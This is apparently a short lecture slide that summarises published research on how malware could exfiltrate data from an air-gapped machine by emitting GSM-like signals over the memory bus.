A machine holds sensitive data and is isolated from network
• If it gets infected, can the malware exfiltrate data?

Answer: yes! [Usenix Sec 2015]


• Mimic GSM signals using data bus
• Use x86 instruction: MOVNTDQ m128, xmm

• Effective for 60 feet
